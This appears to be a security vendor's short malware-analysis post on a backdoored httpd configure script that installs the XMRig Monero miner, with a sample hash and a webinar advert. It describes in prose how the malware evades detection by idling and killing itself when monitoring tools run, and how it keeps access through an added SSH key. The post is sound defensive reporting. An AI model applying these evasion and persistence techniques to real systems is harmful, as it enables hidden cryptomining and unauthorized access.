VMRay Labs has found a backdoored build configuration script for httpd designed to drop and run the XMRig malware to mine Monero. ⛏️
⏳ Surprisingly, the script waits until the user has been inactive for at least a minute before starting the crypto-miner.
🔍 It also looks out for resource monitoring tools such as htop, nmon, or iostat, in which case it kills the resource-heavy XMRig process to avoid being caught. To maintain access, the sample adds the attackers’ public key to the “.ssh/authorized_keys” file, allowing them to re-enter into the compromised machine without a password.
Note, the official httpd configuration script from Apache is NOT backdoored – this is about a custom modification by threat actors, likely to distribute their own backdoored httpd source code to their victims.
In a nutshell:
Our analysis report shows our executable compound sample submission that executes the first two shell script payloads
Sample SHA256:
901d7698b77d4a7cd1a7db3ea61bf866dcee77e677761f9d1ba6d193837e5447
See why we think this is malicious in plain language.
See the whole path of the sample’s execution
Map the malicious activities on the MITRE ATT&CK Framework
Explore detailed information on the IP addresses, URLs and DNS, including function logs and PCAP Streams
Download the IOCs and artifacts to have a clear picture of the threat.
Download the files that the malware downloads, drops or modifies.
Explore how you can use these insights
Ready to stress-test your malware sandbox? Join us for a no-fluff, all-demo webinar that shows you real techniques to evaluate and optimize your sandboxing solution!
